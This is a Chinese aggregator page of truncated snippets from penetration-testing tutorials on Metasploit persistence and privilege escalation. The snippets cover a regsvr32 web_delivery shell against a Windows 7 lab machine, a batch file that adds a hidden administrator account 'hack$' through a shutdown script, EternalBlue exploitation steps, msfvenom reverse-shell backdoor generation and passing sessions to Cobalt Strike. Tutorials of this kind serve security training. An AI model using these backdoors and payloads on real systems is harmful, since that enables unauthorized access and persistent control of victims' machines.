MSF权限维持】的更多相关文章

MSF权限维持 环境搭建 目标机:win7 ip:192.168.224.133 攻击机:kali linux ip:192.168.224.129 首先使用web_delivery模块的regsvr32获取shell, 1.启动msfconsole 2.使用web_delivery模块 3.设置payload 4.设置监听主机和端口 5.设置Regsvr32目标, 6.run运行,生成一个可执行文件, 7.将文件拿到win7目标机上运行. 8.输入sessions,查看session内容 9.…
原文:揭秘Windows系统的四个后门 组策略欺骗后门 创建一个批处理文件add.bat,内容是: @echo off net user hack$ test168 /add net localgroup administrators hack$ /add exit (2)利用 上传运行gpedit.msc,定位到“计算机配置一>Windows设置一>脚本(启动/关机)”, 双击右边窗口的“关机”,在其中添加add.bat. 这样就实现了当系统关机时创建hack$用户,及时被删了,关机时又会再…
---恢复内容开始--- Step1:开启postgresql数据库: /etc/init.d/postgresql start Step2:进入MSF中,搜索cve17-010相关的exp: search -  其中,auxiliary/scanner/smb/smb_ms17_010  是扫描漏洞是否存在的辅助工具 exploit/windows/smb/ms17_010_eternalblue 是用来攻击的 exp Step3:探测漏洞是否存在 1.查看rhosts.rpost use a…
年初九 天公生 0x034 MSF(美少妇) 启动msf msfconsole 先启动msf依赖的postgresql数据库 初始化数据库 msfdb init (要用普通用户) msf路径 /usr/share 制作后门 msfvenom msfvenom -p payload脚本 lhost=监听/攻击机ip lport=端口 -f 文件类型 -o 文件名 linux示例 msfvenom -p linux/x64/meterpreter/reverse_tcp lhost 192.168.…
年初六 六六六 MSF和cs联动 msf连接cs 1.在队伍服务器上启动cs服务端 ./teamserver 团队服务器ip 连接密码 2.cs客户端连接攻击机 填团队服务器ip和密码,名字随便 msf将session发往cs客户端 1.cs设置监听 监听器 - add 选择payload类型和填攻击机ip,端口要对应payload类型 2.进入payload注入模块 use exploit/windows/local/payload_inject 3.设置参数 set disablepaylo…
在WEB渗透中当我们拿到webshell了,我们可以试试用MSF(metasploit)来进行提权,在MSF里meterpreter很强大的! 我们先用msfvenom生成一个EXE的木马后门. msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i -b -f exe > abc.exe 然后在到MSF根据刚才配置的木马后门进行监听... 然后在把木马上传到服务器(受害者)的机器里,必须上传到可读可写的目录下哦,…
msf的强大之处也就不做探讨了,虽然这些东西网上很多.但我想说说我的感受. 这次的演示是在BT5中远程攻击一台win2003 sp2 metasploit是4.3的 需要说明的一点是 现在的BT5中不像BT4中有postgresql数据库 需要使用的须自行安装. 并且现在msf在4.0以后就没有了db_autopwn. 首先在BT5中打开msf. 创建数据库 ,加载db_autopwn 使用db_nmap进行扫描 使用db_autopwn 进行自动化攻击 然后就等一会就可以了,电脑内存有点小.吃…
MSF连续攻击实验 一.实验拓扑 二.实验环境 Windows XP BT 5 32位 三.实验原理 通过扫描 XP主机,利用扫描出的漏洞建立 TCP会话,通过进程的提权,进一步获取目标机的控制权限 四.实验目的 掌握MSF连续攻击的原理和利用MSF攻击检测技术进行服务器漏洞的查找 五.实验步骤 1.  扫描目标主机的开放端口和操作指纹等信息 >db_nmap  -SV –n –v 10.0.0.6 2.扫描结果如下 2.  发起MSF自动攻击 >db_autopwn –p  -t  -e 3…
本文我将向大家介绍在企业网络中使用个人智能手机,会给我们企业网络造成怎样的潜在威胁?事实证明,想要欺骗一位企业内部的员工并让其安装恶意应用程序,其实并不困难.一旦成功,攻击者就可以突破企业内网的防护机制(如杀毒软件等),自由的内网漫游,甚至可以进行权限提升等敏感行为. 声明:本文中提及的公司名称,员工姓名,IP均为虚构,如有雷同纯属巧合! 背景 "超级公司"聘请了我们的一位渗透测试人员,要求我们对其员工进行一次社会工程学的评估.测试范围:利用所有可能的手段来窃取他们预留的文件,并以此展…
首先建议一下到网上查查meterpreter的用法在看这篇文章,理解为什么要使用msf来提权(因为msf里边有个meterpreter很强大 ^_^)Metasploit 拥有msfpayload 和msfencode 这两个工具,这两个工具不但可以生成exe 型后门,一可以生成网页脚本类型的webshell ,通过生成webshell 然后设置监听器,访问webshell的url,幸运的话可以产生一个session,以便进一步利用.下面是具体的利用方法.我们可以通过指令查看msf里的paylo…